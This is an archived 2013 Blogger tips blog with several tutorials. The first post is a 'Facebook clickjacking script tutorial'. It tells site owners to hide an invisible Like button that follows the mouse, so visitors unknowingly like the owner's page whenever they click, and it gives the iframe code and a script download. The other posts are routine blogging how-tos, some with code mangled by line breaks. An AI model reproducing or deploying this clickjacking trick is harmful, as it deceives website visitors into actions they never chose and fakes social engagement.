A multi dynamic site with a whole lot of content. get an up to date info on techs and satelite related problems
Showing posts with label Blogging Tips. Show all posts
Showing posts with label Blogging Tips. Show all posts

Monday, October 7, 2013

FACEBOOK CLICKJACKING SCRIPT TUTORIAL.

Hello friends today am going to write another article on how to increase your facebook likes. This time around we are going to make use of a script to increase our facebook like , this method is kown as fans Clickjack.

HOW IT WORKS

Clickjack is just a javascript that works on your webpage, is basically any invincible button which moves with your cursor 'mouse' so when someone visits your website and clicks on any thing in, he or she has automatically clicked on the like button. Cool uhn.

PROCEDURE


Simple download the script below copy and paste the  script just above the </ head> tag

Download Here





Download  script.
Copy and paste the  script just above the < / body > tag


< iframe src="http://www.facebook.com/plugins /like.php?href=Replace Your facebook fanpageurl&layout=button_count&show_faces=false&width=50&action=like&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true">< /iframe>






Download Here



remember to replace the text that says insert your facebook fanpage id . with your fanpage url
Enjoy it.

If this article has been well recieved by you please click on the share button below.

Monday, July 29, 2013

HOW TO HOST FILES WITH BLOGGER.

The soul purpose of hosting files is to avoid issues of copy right product, take for instance you want to write a tutorial on how to create a blog, you would have to think of the kind of image to use. Now geting the image is not the problem , of cuz you can just go to google, get the image url and paste it in your site unknow to you that , that paticular file could be a copy right product.

A copyright is a form of intellectual property law which protects original works of authorship including literary, dramatic, musical, and artistic works such as poetry, novels, movies, songs, computer software and architecture. Copyright law does not protect facts, ideas, systems, or methods of operation, although it may protect the way these things are expressed.
[source: inventors.about.com]

The use of copy right products could lead to

*. lossing your adsense account
*. Low site ranking.
E.t.c

STEPS:


PC USERS

1. Goto your administrative page.

2. Create a new post

3. look at the top bar, there is a place with the inscription add file.

4. Click on it and select the file you want to add, wait for it to finish loading.

5. Click on the image to edit it and re-name it.

MOBILE USERS

1. Learn how to post via email.

2. Change your email post settings to 'Save emails as draft'

3. Goto Gmail.com

3. Compose a message with the the attach file. Note: you can send more than one file, just goto attach many files and upload all the files.

4. Send it to your blog.

5. Goto your administrative page >>> draft>> look for the recent draft, click on preview to few the draft.

6. Now copy the file url and use it for your article.

#END#

HOW TO POST VIA EMAIL.

HOW TO POST VIA EMAIL.

After several research i discovered that some blog Authors find it difficult to publish post via mobile must especially when you are making use of a java or a symbian phone. I realised that you can't view the administrators page using mobile opera mini,normal browser,i browser e.t.c you can only open your administrative page using ucweb but can't host your own images which would lead you uploading copy right products.

I would teach you how to host your files in the next tutorial for now am going to teach you how to publish a post via email.

STEPS:

1. Visit your administrative page blogger.

2. Click on Settings

3. Click on mobile and email .

4. Click on posting via email.

5. You would get some thing like this
Raperholic40.
@blogger.com
I.e the mail you use to open your blog plus a secret code you would use to send publish post to your blog . Note: Don't give these code to a third party, just so they won't use it against you.

6.
Publish email immediately

Save email as draft post


Disable

Make your choice.


7. Now goto to Gmail and insert the send to field in the format below. Subject and the body of the post.


Note: don't insert html codes to beautify the post because they would end up not appearing as you want it. So if you want to add html codes you can edit the post later.

please do leave your comments below:

#END#




Tuesday, July 16, 2013

HOW TO CREATE YOUR OWN SEARCH ENGINE

You can now create your own personal search engine with your own name as logo, hm sounds great uhn .

STEPS ON HOW TO CREATE YOUR OWN SEARCH ENGINE


1. Goto http://www.funnylogo.info

You would see an empty field, enter the name of your search engine and select the style you like.


2. Click on create my search engine and you are done.

You can also put your search engine in your blog for visitors to see.All you need do is to copy the 'url' and paste it in your blog.



NOTE: Google still remains the search engine. You just changed the logo and personalize it.

#END#

Saturday, April 6, 2013

How to Put Google AdSense Ads Inside Blogger Posts (Wrapped in Text)

How to Put Google AdSense Ads Inside Blogger Posts (Wrapped in Text)

In this post I'm going to share you an AdSense trick which will allow
you to place AdSense ads inside your blog posts. Also, you can Place
your AdSense Ad in any part of your posts.Once Added you can place the
ads anywhere in the post (whether between Paragraphs, Middle of your
Content etc. etc.. Wherever you want). Cool.. Right?? So, Placing the
AdSense Code experimentally into your Blog/ website can make you Huge
Income. What you have to do is simply follow my steps carefully so
that you should not face any problem.
Before Making any changes to your Blog/Website, make sure to Backup
Your Blogger Template. Steps to Place AdSense Ads inside Blogger Posts

1.Go to Your Google AdSense account and choose the type of ad you want
inside your blog posts and Get the Code for the AdSense Unit.

2. Since the AdSense Code will be used to place in your blog templates
html; so your Ad Code must be Parsed. To do this, go gt a html encoder
or goo-gle it
and Paste your AdSense Code and Click on Convert. After That Select
all and Copy the Parsed Code.

3.Your AdSense Code is now Ready. Now we will Place the AdSense Code
to the Blog Template.

Go to Template –> Edit HTML –> Proceed. Tick the 'Expand Widget
Templates' Box.
Now Find the Following Piece Of code
[Tip: Use Ctrl+F]
<data:post.body/> REPLACE the Code i.e., <data:post. body/> with the
Following Code: <div expr:id='"aim1"+ data:post.id'></ div> <div
style="clear:both; margin:10px0">
PUTYOURPARSED ADSENSECODE HERE</div> <div expr:id='"aim2"+
data:post.id'> <data:post.body/> </div> <script type="text/
javascript"> varobj0=document. getElementById ("aim1<data:post.
id/>"); varobj1=document. getElementById ("aim2<data:post. id/>"); var
s=obj1.innerHTML; varr=s.search(/ \x3C!--adsense-- \x3E/igm); if(r>0)
{obj0.innerHTML=s. substr(0,r);obj1. innerHTML=s.substr (r+16);}
</script>

Note: Some Templates may have more than one <data:post.body/> Code. In
this situation Replace all the <data:post.body/>
code with the above Code. Now, Replace PUT YOURPARSED ADSENSECODE HERE
above with your Parsed AdSense Code . Now Click 'Save Template' . In
Order To place the Ad in any part of your blog post, Simply place the
following piece of code in your post in the exact place you want the
Ad to appear: <!-- adsense -->
[Note: Place the above piece of code on the HTML of the Post.] So
if you place the <!-- adsense --> tag at the top of your post the ad
will appear there. Float The AdSense Unit And Wrap In Text If you want
to either float your AdSense unit on the left or right or wrap it in
text you can add another snippet of code.
The code will be placed above the <!-- adsense --> tag and closed
below. This is the code you will add, it is set to float on the left
wrapped in text with directions to change the position below: <div
style="float: left; margin- right: 5px;"> <!-- adsense --> </div>

Note - To float the Unit on the right change the red text to
float:right and margin-left. That's all for today.

Add a Cute Flying Twitter Bird Widget To Blogger

Add a Cute Flying Twitter
Bird Widget To Blogger
<hr>
Today I'm going to show
you "How to add the Cute
Animated Twitter Bird To Blogger".
You might have seen the Twitter
Bird Flying all over my Blog; and
it's really Cool. Right?? So if you
want it I will show you how I Put
the Twitter Bird on my blog. With
the Twitter's worldwide popularity
it has become a compulsory job for
every web master to use twitter
sharing buttons and its applications
as much on his blog as possible.This
lets users to easily tweet our blogs
and websites which thereby
generates traffic for us in return.
Screenshot of the cool Flying
Twitter Bird Widget:
Now, in order to add this widget
follow my below steps exactly as I

describe:

First go to Template –>
Edit HTML –> Proceed
Now search for </body>

[Tip: Use
Ctrl+F to find]
Then Copy the Following
Piece of Code and Paste
the Code right After the
</body>

<!--TwitterBird
start
The wapbeast Tips-->

<script
src= 'http:/ /
yourjavascript.co m
/1523826141/Flying
twitterbird.js'
type='text/
javascript'>
</script><script
type='text/
javascript'>var
twitterAccount=
"Addyour
Twittername
here";var
tweetThisText="
<data:blog.
pageTitle/>:
<data:blog.url/>
";tripleflapInit
();</script>
<spanstyle='font-
size:11px;position
:absolute;'/><a
href= 'http:/ /
www.TheXtremeTips .
com'
target='_blank'>
TwitterBird
Gadget</a><!--
TwitterBirdend
TheXtremeTips.com
-->

Now Replace Add your
Twitter name here With
your Twitter ID
Then Click 'Save
Template' and you are
done
View your Blog to see it
flying. Happy
Blogging..!!!

How to add Social bookmarking gadget with Egg sliding effect in blogger

How to add Social
bookmarking gadget with
Egg sliding effect in
blogger
Social Sharing Widgets are very
much important For a blog to draw
the attention of large numbers of
unique Visitors from Social
Networks. Attractive Social
Sharing widgets enhance the
visitor's interest to share your
posts on his/her Friends Circle. So,
On this Post I will guide you to
" Add Social Bookmarking Widget
with Egg Sliding effect for Blog".
Follow the Following steps to
Implement It Into Your Blogger
Blog:
Login to your Blog and Go
to Template—> Edit HTML
–> Proceed. [ Note: Kindly
Backup your Template
before making any
changes ]
Now, Search for </Head>
and paste the following
Codes just above it.

<script type="text/javascript"
src="http://w.sharethis.com/
gallery/shareegg/
shareegg.js
"></script><script
type="text/javascript"
src="http://w.sharethis.com/
button/buttons.js
"></
script><script type="text/
javascript">stLight.options
({publisher:
"a24ff27f-9f78-47f2-964b-0ff1c
6637032", onhover:false}); </
script><link media="screen"
type="text/css"
rel="stylesheet" href="http://
w.sharethis.com/gallery/
shareegg/shareegg.css
"></link>

Again, Search for </
Body> and paste the
following codes just above
it.

<div style='position: fixed;
bottom: 2%; left: 2%;'><div
class='shareEgg'
id='shareThisShareEgg'/></
div><script type='text/
javascript'>stlib.shareEgg.
createEgg
(&#39;shareThisShareEgg&#39;
, [&#39;facebook&#39;,&#39;
twitter&#39;,&#39;googleplus&#
39;,&#39;linkedin&#39;,&#39;
blogger&#39;,&#39;stumbleupon
&#39;,&#39;sharethis&#39;],
{title:&#39;<data:blog.pageTitle/
>&#39;,url:&#39;<data:blog.url/
>&#39;,theme:&#39;shareegg&#
39;});</script>

Now, Save your Template.
you are done..!!

 
Design by koozee Contact08136470405